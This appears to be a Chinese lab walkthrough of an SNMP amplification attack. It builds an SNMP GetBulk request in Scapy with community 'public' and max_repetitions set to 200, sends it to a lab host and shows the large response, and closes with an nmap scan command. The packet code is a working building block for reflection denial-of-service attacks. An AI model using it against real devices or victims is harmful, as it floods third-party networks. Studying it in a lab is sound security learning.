SNMP放大攻击
SNMP放大攻击
相关Scapy构造数据包
定义IP包
>>> i=IP()
>>> i.dst="192.168.180.134"
>>> i.display()
###[ IP ]###
version= 4
ihl= None
tos= 0x0
len= None
id= 1
flags=
frag= 0
ttl= 64
proto= hopopt
chksum= None
src= 192.168.180.131
dst= 192.168.180.134
\options\
---------------------------------------------------------
定义UDP包
>>> u=UDP()
>>> u.dport=161
>>> u.sport=161
>>> u.display()
###[ UDP ]###
sport= snmp
dport= snmp
len= None
chksum= None
----------------------------------------------------------
定义SNMP包
>>> s=SNMP()
>>> s.community="public"
>>> s.display()
###[ SNMP ]###
version= 'v2c' 0x1 <ASN1_INTEGER[1]>
community= 'public'
\PDU\
|###[ SNMPget ]###
| id= 0x0 <ASN1_INTEGER[0]>
| error= 'no_error' 0x0 <ASN1_INTEGER[0]>
| error_index= 0x0 <ASN1_INTEGER[0]>
| \varbindlist\
----------------------------------------------------------
定义SNMP的bulk
b=SNMPbulk()
b.display()
b.max_repetitions = 200
s.PDU=b
b.varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')),SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.19.1.3'))]
s.display()
r=(i/u/s)
r.display()
sr1(r)
>>> b=SNMPbulk()
>>> b.display()
###[ SNMPbulk ]###
id= 0x0 <ASN1_INTEGER[0]>
non_repeaters= 0x0 <ASN1_INTEGER[0]>
max_repetitions= 0x0 <ASN1_INTEGER[0]>
\varbindlist\
>>> b.max_repetitions=200
>>> b.display()
###[ SNMPbulk ]###
id= 0x0 <ASN1_INTEGER[0]>
non_repeaters= 0x0 <ASN1_INTEGER[0]>
max_repetitions= 200
\varbindlist\
>>> s.PDU=b
>>> s.display()
###[ SNMP ]###
version= 'v2c' 0x1 <ASN1_INTEGER[1]>
community= 'public'
\PDU\
|###[ SNMPbulk ]###
| id= 0x0 <ASN1_INTEGER[0]>
| non_repeaters= 0x0 <ASN1_INTEGER[0]>
| max_repetitions= 200
| \varbindlist\
>>> b.varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')),SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.19.1.3'))]
>>> s.display()
###[ SNMP ]###
version= 'v2c' 0x1 <ASN1_INTEGER[1]>
community= 'public'
\PDU\
|###[ SNMPbulk ]###
| id= 0x0 <ASN1_INTEGER[0]>
| non_repeaters= 0x0 <ASN1_INTEGER[0]>
| max_repetitions= 200
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid= <ASN1_OID['.1.3.6.1.2.1.1']>
| | value= <ASN1_NULL[0]>
| |###[ SNMPvarbind ]###
| | oid= <ASN1_OID['.1.3.6.1.2.1.19.1.3']>
| | value= <ASN1_NULL[0]>
>>> r=(i/u/s)
>>> r.display()
###[ IP ]###
version= 4
ihl= None
tos= 0x0
len= None
id= 1
flags=
frag= 0
ttl= 64
proto= udp
chksum= None
src= 192.168.180.131
dst= 192.168.180.134
\options\
###[ UDP ]###
sport= snmp
dport= snmp
len= None
chksum= None
###[ SNMP ]###
version= 'v2c' 0x1 <ASN1_INTEGER[1]>
community= 'public'
\PDU\
|###[ SNMPbulk ]###
| id= 0x0 <ASN1_INTEGER[0]>
| non_repeaters= 0x0 <ASN1_INTEGER[0]>
| max_repetitions= 200
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid= <ASN1_OID['.1.3.6.1.2.1.1']>
| | value= <ASN1_NULL[0]>
| |###[ SNMPvarbind ]###
| | oid= <ASN1_OID['.1.3.6.1.2.1.19.1.3']>
| | value= <ASN1_NULL[0]>
------------------------------------------------------------
发送snmp包
>>> sr1(r)
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
<IP version=4 ihl=5 tos=0x0 len=1500 id=360 flags=MF frag=0 ttl=128 proto=udp chksum=0x294e src=192.168.180.134 dst=192.168.180.131 |<UDP sport=snmp dport=snmp len=8915 chksum=0xa39d |<Raw load='0\x82"\xc7\x02\x01\x01\x04\x06public\xa2\x82"\xb8\x02\x01\x00\x02\x01\x00\x02\x01\x000\x82"\xab0\x81\x8a\x06\x08+\x06\x01\x02\x01\x01\x01\x00\x04~Hardware: x86 Family 6 Model 158 Stepping 13 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)0\x10\x06\ .........
探测
nmap -sU -p161 192.168.180.134
参考:
http://wmsbc.xyz/views/2020/DDOS%E5%8E%9F%E7%90%86%E4%B8%8E%E9%98%B2%E5%BE%A1.html
http://drops.xmd5.com/static/drops/tips-2106.html
https://www.jianshu.com/p/a9c48cc6985d
https://blog.csdn.net/Jack0610/article/details/88690365